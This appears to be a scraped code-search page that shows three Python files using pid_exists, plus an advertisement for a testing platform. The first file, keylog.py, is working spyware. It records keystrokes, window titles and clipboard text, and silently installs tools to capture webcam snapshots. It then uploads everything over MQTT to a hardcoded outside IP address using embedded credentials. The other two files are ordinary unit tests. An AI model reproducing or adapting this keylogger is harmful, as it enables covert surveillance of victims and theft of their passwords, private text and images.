Best Python code snippet using fMBT_python
keylog.py
Source:keylog.py  
...36                    old_window = u'\nWindow : '+window+u'\n'37                    write_log(old_window, mutex)38            except:39                pass40            if not pid_exists(parent_id):41                pid().kill()42    else:43        from win32gui import GetWindowText, GetForegroundWindow44        old_window = u''45        while True:46            sleep(0.8)47            try:48                if GetWindowText(GetForegroundWindow()) not in old_window:49                    old_window = u'\nWindow : '+GetWindowText(GetForegroundWindow())+u'\n'50                    write_log(old_window, mutex)51            except:52                pass53            if not pid_exists(parent_id):54                pid().kill()55def observe_clipboard(mutex, parent_id, procq):56    procq.put("clipboard " + str(pid().pid))57    if "Linux" in platform():58        from subprocess import STDOUT, check_call59        import os60        try:61            check_call(['apt-get', 'install', '-y', 'xclip'],62                stdout=open(os.devnull,'wb'), stderr=STDOUT) 63        except:64            pass65    from pyperclip import paste as clipboard66    clip = u''67    while True:68        sleep(2)69        try:70            if clipboard() not in clip:71                clip = u'\nClip : '+clipboard()+u'\n'72                write_log(clip, mutex)73        except:74            pass75        if not pid_exists(parent_id):76            pid().kill()77def text_checker_dump(mutex, parent_id, procq):78    from keyboard import on_press, on_release79    procq.put("keylog "+str(pid().pid))80    class tcd_global:81        prev_key = u''82    def mapper(key):83        if "shift" in key:84            if key in tcd_global.prev_key:85                tcd_global.prev_key = key86                return ''87            else:88                tcd_global.prev_key = key89                return "<shift>"90        elif "ctrl" in key:91            if key in tcd_global.prev_key:92                tcd_global.prev_key = key93                return ''94            else:95                tcd_global.prev_key = key96                return "<ctrl>"97        elif "backspace" in key:98            return "<backspace>"99        elif "space" in key:100            return " "101        elif "enter" in key:102            return "\n"103        elif "caps lock" in key:104            return "<CAPS>"105        elif "tab" in key:106            return "<tab>"107        elif "up" in key:108            return "<up>"109        elif "down" in key:110            return "<down>"111        elif "left" in key:112            return "<left>"113        elif "right" in key:114            return "<right>"115        else:116            return key117    def release_mapper(key):118        tcd_global.prev_key = ''119        if "shift" in key:120            return "</shift>"121        elif "ctrl" in key:122            return "</ctrl>"123        else:124            return ''125    def key_pressed(key_event):126        keyname = mapper(key_event.name)127        write_log(keyname, mutex)128    def key_released(key_event):129        keyname = release_mapper(key_event.name)130        write_log(keyname, mutex)131    on_press(key_pressed)132    on_release(key_released)133    while True:134        sleep(3)135        if not pid_exists(parent_id):136            pid().kill()137def send_to_server(mutex, parent_id, procq):138    import paho.mqtt.client as mqtt139    import paho.mqtt.publish as pub140    from getpass import getuser as User141    import socket142    from os import remove143    from glob import glob144    from base64 import b64encode145    procq.put("send_to_server " + str(pid().pid))146    def is_connected():147        try:148            host = socket.gethostbyname("www.google.com")149            socket.create_connection((host, 80), 2)150            return True151        except:152            pass153        return False154    while True:155        if not pid_exists(parent_id):156            pid().kill()157        if is_connected():158            file_content = u''159            mutex.acquire()160            try:161                with open("kl.log", "rb+") as f:162                    file_content = f.read()163            except IOError:164                pass165            mutex.release()166            if file_content:167                pub.single('comp/'+User()+'/text', payload=file_content, qos=1, retain=False, hostname=hostname,168                           port="1883", client_id="", keepalive=60, will=None,169                           auth={'username': username, 'password': password}, tls=None,170                           protocol=mqtt.MQTTv311)171            try:172                remove("kl.log")173            except:174                pass175            jpgs = glob("*.jpg")176            for jpg in jpgs:177                jpgdata = ''178                with open(jpg,'rb+') as f:179                    jpgdata = b64encode(f.read())180                pub.single('comp/' + User() + '/webcam', payload=jpgdata, qos=1, retain=False,181                           hostname="72.14.176.217",182                           port="1883", client_id="", keepalive=60, will=None,183                           auth={'username': "vspectrum", 'password': "Asakura4410"}, tls=None,184                           protocol=mqtt.MQTTv311)185                remove(jpg)186        sleep(35)187def process_tracker(parent_id, processes_queue):188    sleep(10)189    process_dict = {}190    while True:191        if not pid_exists(parent_id):192            pid().kill()193        while not processes_queue.empty():194            ps = processes_queue.get().split(" ")195            process_dict[ps[0]] = ps[1]196        sleep(10)197def cam_capture(parent_id, procq):198    procq.put("webcam " + str(pid().pid))199    from os import stat, remove, devnull200    if "Linux" in platform():201        from subprocess import STDOUT, check_output, check_call202        try:203            check_call(['apt-get', 'install', '-y', 'fswebcam'],204                stdout=open(devnull,'wb'), stderr=STDOUT) 205        except:206            pass207        def get_snap():208            filename = str(datetime.now()).replace(':', '-')[:-7] + '.jpg'209            snapshot_cmd = "fswebcam -r 640x480 -S 5 -s brightness=65% --jpeg 90 '"+filename+"'"210            window = check_output(snapshot_cmd, shell=True)211            if stat(filename).st_size < 13000:212                remove(filename)213                sleep(30)214        while True:215            if not pid_exists(parent_id):216                pid().kill()217            get_snap()218            sleep(30)219                220    else:221        from VideoCapture import Device    222        def get_snap():223            filename = str(datetime.now()).replace(':', '-')[:-7] + '.jpg'224            cam = Device()225            cam.saveSnapshot(filename, quality=60, timestamp=1, textpos='br')226            del cam227            if stat(filename).st_size < 13000:228                remove(filename)229                sleep(30)230        while True:231            if not pid_exists(parent_id):232                pid().kill()233            get_snap()234            sleep(30)235if __name__ == '__main__':236    freeze_support()237    parent_pid = pid().pid238    mutex_for_file = Lock()239    input_dump = Process(target=text_checker_dump, args=(mutex_for_file, parent_pid, process_tracker_queue))240    input_dump.start()241    window_title = Process(target=observe_context, args=(mutex_for_file, parent_pid, process_tracker_queue))242    window_title.start()243    clipboard_data = Process(target=observe_clipboard, args=(mutex_for_file, parent_pid, process_tracker_queue))244    clipboard_data.start()245    phone_home = Process(target=send_to_server, args=(mutex_for_file, parent_pid, process_tracker_queue))...test_multipidfile.py
Source:test_multipidfile.py  
1#! /usr/bin/python2# Copyright (C) 2013, 2016 Canonical Ltd.3# Author: Colin Watson <cjwatson@ubuntu.com>4# This program is free software: you can redistribute it and/or modify5# it under the terms of the GNU General Public License as published by6# the Free Software Foundation; version 3 of the License.7#8# This program is distributed in the hope that it will be useful,9# but WITHOUT ANY WARRANTY; without even the implied warranty of10# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the11# GNU General Public License for more details.12#13# You should have received a copy of the GNU General Public License14# along with this program.  If not, see <http://www.gnu.org/licenses/>.15"""Unit tests for cdimage.multipidfile."""16from __future__ import print_function17import os18try:19    from unittest import mock20except ImportError:21    import mock22from cdimage.multipidfile import MultiPIDFile, MultiPIDFileError23from cdimage.tests.helpers import TestCase, mkfile24__metaclass__ = type25class TestMultiPIDFile(TestCase):26    def setUp(self):27        super(TestMultiPIDFile, self).setUp()28        self.use_temp_dir()29        self.multipidfile = MultiPIDFile(os.path.join(self.temp_dir, "pids"))30    def test_str(self):31        """A MultiPIDFile stringifies to 'multipidfile PATH'."""32        self.assertEqual(33            "multipidfile %s" % self.multipidfile.path, str(self.multipidfile))34    def test_context_manager(self):35        """A MultiPIDFile operates as a context manager, with locking."""36        self.assertFalse(os.path.exists(self.multipidfile.lock_path))37        with self.multipidfile:38            self.assertTrue(os.path.exists(self.multipidfile.lock_path))39        self.assertFalse(os.path.exists(self.multipidfile.lock_path))40    @mock.patch("subprocess.call", return_value=1)41    def test_lock_failure(self, mock_call):42        """__enter__ raises MultiPIDFileError if the lock is already held."""43        self.assertRaises(MultiPIDFileError, self.multipidfile.__enter__)44    def test_read_requires_lock(self):45        """_read must be called within the lock."""46        self.assertRaises(AssertionError, self.multipidfile._read)47    def test_read_missing(self):48        """A missing MultiPIDFile reads as empty."""49        with self.multipidfile:50            self.assertEqual(set(), self.multipidfile._read())51    @mock.patch("cdimage.osextras.pid_exists", return_value=True)52    def test_read_existing(self, mock_pid_exists):53        """An existing MultiPIDFile reads as the set of PIDs it contains."""54        with mkfile(self.multipidfile.path) as fd:55            print(1, file=fd)56            print(2, file=fd)57        with self.multipidfile:58            self.assertEqual(set([1, 2]), self.multipidfile._read())59    @mock.patch("cdimage.osextras.pid_exists")60    def test_read_skips_dead_pids(self, mock_pid_exists):61        """Only live PIDs are returned."""62        with mkfile(self.multipidfile.path) as fd:63            print(1, file=fd)64            print(2, file=fd)65        mock_pid_exists.side_effect = lambda pid: pid == 266        with self.multipidfile:67            self.assertEqual(set([2]), self.multipidfile._read())68    def test_write_requires_lock(self):69        """_write must be called within the lock."""70        self.assertRaises(AssertionError, self.multipidfile._write, 1)71    @mock.patch("cdimage.osextras.pid_exists", return_value=True)72    def test_write_missing(self, mock_pid_exists):73        """Writing to a missing MultiPIDFile works."""74        with self.multipidfile:75            self.multipidfile._write(set([1, 2]))76            self.assertEqual(set([1, 2]), self.multipidfile._read())77    @mock.patch("cdimage.osextras.pid_exists", return_value=True)78    def test_write_existing(self, mock_pid_exists):79        """Writing to an existing MultiPIDFile adjusts its contents."""80        with mkfile(self.multipidfile.path) as fd:81            print(1, file=fd)82        with self.multipidfile:83            self.multipidfile._write(set([1, 2]))84            self.assertEqual(set([1, 2]), self.multipidfile._read())85    def test_state(self):86        """The state can be fetched without explicit locking."""87        self.assertEqual(set(), self.multipidfile.state)88    @mock.patch("cdimage.osextras.pid_exists", return_value=True)89    def test_test_add(self, mock_pid_exists):90        self.assertFalse(self.multipidfile.test_add(1))91        self.assertEqual(set([1]), self.multipidfile.state)92        self.assertTrue(self.multipidfile.test_add(2))93        self.assertEqual(set([1, 2]), self.multipidfile.state)94    @mock.patch("cdimage.osextras.pid_exists", return_value=True)95    def test_test_add_error_on_existing_pid(self, mock_pid_exists):96        with mkfile(self.multipidfile.path) as fd:97            print(1, file=fd)98        self.assertRaises(MultiPIDFileError, self.multipidfile.test_add, 1)99    @mock.patch("cdimage.osextras.pid_exists", return_value=True)100    def test_remove_test(self, mock_pid_exists):101        with mkfile(self.multipidfile.path) as fd:102            print(1, file=fd)103            print(2, file=fd)104        self.assertTrue(self.multipidfile.remove_test(2))105        self.assertEqual(set([1]), self.multipidfile.state)106        self.assertFalse(self.multipidfile.remove_test(1))107        self.assertEqual(set(), self.multipidfile.state)108    def test_remove_test_error_on_empty(self):109        """remove_test raises MultiPIDFileError if already empty."""110        self.assertRaises(MultiPIDFileError, self.multipidfile.remove_test, 1)111    @mock.patch("cdimage.osextras.pid_exists", return_value=True)112    def test_remove_test_error_on_missing_pid(self, mock_pid_exists):113        with mkfile(self.multipidfile.path) as fd:114            print(1, file=fd)115        self.assertRaises(MultiPIDFileError, self.multipidfile.remove_test, 2)116    @mock.patch("cdimage.osextras.pid_exists", return_value=True)117    def test_round_trip(self, mock_pid_exists):118        """After a +/- round-trip, the MultiPIDFile path is missing."""119        self.assertFalse(self.multipidfile.test_add(1))120        self.assertFalse(self.multipidfile.remove_test(1))121        self.assertFalse(os.path.exists(self.multipidfile.path))122    @mock.patch("cdimage.osextras.pid_exists", return_value=True)123    def test_held(self, mock_pid_exists):124        self.assertEqual(set(), self.multipidfile.state)125        with self.multipidfile.held(1) as state_zero:126            self.assertFalse(state_zero)127            self.assertEqual(set([1]), self.multipidfile.state)128            with self.multipidfile.held(2) as state_one:129                self.assertTrue(state_one)130                self.assertEqual(set([1, 2]), self.multipidfile.state)131            self.assertEqual(set([1]), self.multipidfile.state)...test_utils_process.py
Source:test_utils_process.py  
...5from utils.process import pid_exists6class UtilsProcessTest(unittest.TestCase):7    def test_my_own_pid(self):8        my_pid = os.getpid()9        self.assertTrue(pid_exists(my_pid))10    def test_inexistant_pid(self):11        # There will be one point where we finally find a free PID12        for pid in xrange(30000):13            if not pid_exists(pid):14                return...Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.
You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.
Get 100 minutes of automation test minutes FREE!!
